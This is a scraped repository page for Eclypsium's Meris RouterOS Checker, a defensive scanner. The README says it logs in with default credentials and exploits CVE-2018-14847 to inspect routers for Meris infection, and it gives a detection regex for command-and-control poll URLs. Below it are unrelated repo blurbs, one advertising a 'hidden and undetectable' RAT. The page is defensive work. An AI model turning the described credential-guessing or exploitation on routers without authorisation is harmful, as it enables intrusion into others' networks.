This tool will check a list of IP addresses of RouterOS-based routers to validate if they were infected with Meris.

Overview

Meris RouterOS Checker

This tool will check a list of ip addresses of RouterOS-based routers to validate if they were infected with Meris.

The tool will:

  • Attempt to connect using credentials in credentials.txt file (1 pair of credentials per line, default provided)
  • Attempt to exploit the router using CVE-2018-14847

The tool supports:

  • RouterOS API
  • SSH
  • WinBox (tested for <= 6.42)

The tool uses:

The tool will output exploited.csv file with a table of results for each provided IP address.

Note: To build modified version of bytheway, use provided cpp files instead of original main.cpp when building. You need to name the binaries btw and btw_stage2 respectively, and put them next to the tool

Detection rules

The tool will attempt to list scheduler scripts, and attempt to check if it contains any IoCs listed in indicators.txt. The tool will also attempt to match scheduler scripts contents to the regex https?://[^/]+/poll/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}, and flag the matches as possible infections.

Tool usage

The tool requires either an --ip or --ipfile option.

--ip option takes a single ip address as input, --ipfile takes a file with a list of ips, one ip per file, as input.

Optionally, --threads can be used to tune the number of threads, with default being 16.

Issues
  • Fixed cred loader split to only delimiter first :

    Fixed cred loader split to only delimiter first :

    I ran into an issue with a randomly generated password for the Mikrotik admin that caused the PoC to not be able to authenticate. Turned out that the password had a colon in it and line 38 was splitting it into 3 parts instead of 'username','password'

    Changed split maxsplit to 1 so any occurrences of a colon in the actual password will be ignored. Tested to work both with and without a colon in the password now.

    opened by TalonM 0
  • Meris Check For Dummies™

    Meris Check For Dummies™

    Hi thanks for creating this! 👍

    Could you include some instructions for people that might understand that req.txt has some importance, but not exactly know what to do without googling it?

    Thanks!

    opened by briantopping 10
Owner
Eclypsium
Eclypsium
Using Visual Studio C++ to read IP addresses and comport number (Serial number) on Windows platform

Using Visual Studio C++ to read IP addresses on Windows platform

zhuhuijin 0 Feb 2, 2022
Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Aug 2, 2022
Netif - Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Aug 2, 2022
An SSH file manager that lets you edit files like they are local

An SSH file manager that lets you edit files like they are local

Allan Boll 445 Jul 29, 2022
Nagios Plugin to check Call Quality in SIP VoIP (compatible checkmk, etc)

sipnagios Nagios Plugin to check Call Quality in SIP VoIP (compatible with check_mk, Zabbix, etc) sipnagios implements the Nagios plugin API for monit

null 23 Nov 16, 2021
A list of network measurement sketch algorithms implemented in eBPF

eBPF Sketches This repository contains a list of the most famous sketches implemented within the eBPF/XDP subsystem. In particular, we have: Count Ske

null 11 May 22, 2022
pwru is an eBPF-based tool for tracing network packets in the Linux kernel with advanced filtering capabilities.

pwru (packet, where are you?) pwru is an eBPF-based tool for tracing network packets in the Linux kernel with advanced filtering capabilities. It allo

Cilium 844 Aug 7, 2022
Winpcap-based network packet capture tool, support TLS (part), UDP, ICMP, TCP, ARP, DNS and other protocol analysis, interface reference wireshark.

Winpcap-based network packet capture tool, support TLS (part), UDP, ICMP, TCP, ARP, DNS and other protocol analysis, interface reference wireshark.

null 38 Aug 5, 2022
A Linux Host-based Intrusion Detection System based on eBPF.

eHIDS 介绍 eBPF内核技术实现的HIDS demo. 功能实现: TCP网络数据捕获 UDP网络数据捕获 uprobe方式的DNS信息捕获 进程数据捕获 uprobe方式实现JAVA的RASP命令执行场景事件捕获 eBPF的go框架实现,针对kprobe\uprobe挂载方式,多类型even

CFC4N 255 Aug 7, 2022
Warp speed Data Transfer (WDT) is an embeddedable library (and command line tool) aiming to transfer data between 2 systems as fast as possible over multiple TCP paths.

WDT Warp speed Data Transfer Design philosophy/Overview Goal: Lowest possible total transfer time - to be only hardware limited (disc or network bandw

Facebook 2.7k Jul 26, 2022
The BNG Blaster is a test tool to simulate thousands of PPPoE or IPoE subscribers including IPTV, traffic verification and convergence testing capabilities.

RtBrick BNG Blaster The BNG Blaster is a test tool to simulate thousands of PPPoE or IPoE subscribers including IPTV, traffic verification and converg

RtBrick 89 Jul 6, 2022
LANDrop is a cross-platform tool that you can use to conveniently transfer photos, videos, and other types of files to other devices on the same local network.

LANDrop is a cross-platform tool that you can use to conveniently transfer photos, videos, and other types of files to other devices on the same local network.

LANDrop 2.9k Aug 1, 2022
owfuzz: a WiFi protocol fuzzing tool using openwifi.

Openwifi is an open-source WiFi protocol stack based on SDR that is fully compatible with Linux mac80211. It's driver takes advantage of the Linux kernel's supports (mac80211, cfg80211) for WiFi high MAC, so it can provide an interface to the application layer like a common WiFi USB dongle.

Alipay 136 Jul 27, 2022
A Hidden and Undetectable Remote Access Tool written in C++ and Server in Python3

Spyware-RAT A Hidden and Undetectable Remote Access Tool written in C++ and Server in Python3 This program utilizes the standard winsock library for s

null 35 Aug 5, 2022
ebpfkit-monitor is a tool that detects and protects against eBPF powered rootkits

ebpfkit-monitor ebpfkit-monitor is an utility that you can use to statically analyse eBPF bytecode or monitor suspicious eBPF activity at runtime. It

Guillaume Fournier 63 Jul 26, 2022
Corkscrew is a tool for tunneling SSH through HTTP proxies

Corkscrew is a tool for tunneling SSH through HTTP proxies

Bryan Chan 892 Aug 10, 2022
GCFFlasher is the tool to program the firmware of dresden elektronik's Zigbee products.

GCFFlasher 4 GCFFlasher is the tool to program the firmware of dresden elektronik's Zigbee products. Supported Hardware ConBee I ConBee II RaspBee I R

dresden elektronik ingenieurtechnik gmbh 21 Jul 8, 2022
Tool for Preventing Data Exfiltration with eBPF

bouheki: Tool for Preventing Data Exfiltration with eBPF bouheki is a KSRI implementation using LSM Hook by eBPF. Flexibility to apply restricted netw

mrtc0 44 Aug 3, 2022
zMonkey is an open-source 200G network impairment emulator tool

zMonkey is an open-source 200G network impairment emulator tool to emulate the real-world WAN/DC conditions for your applications. it can supp

Mie~~~ 15 May 14, 2022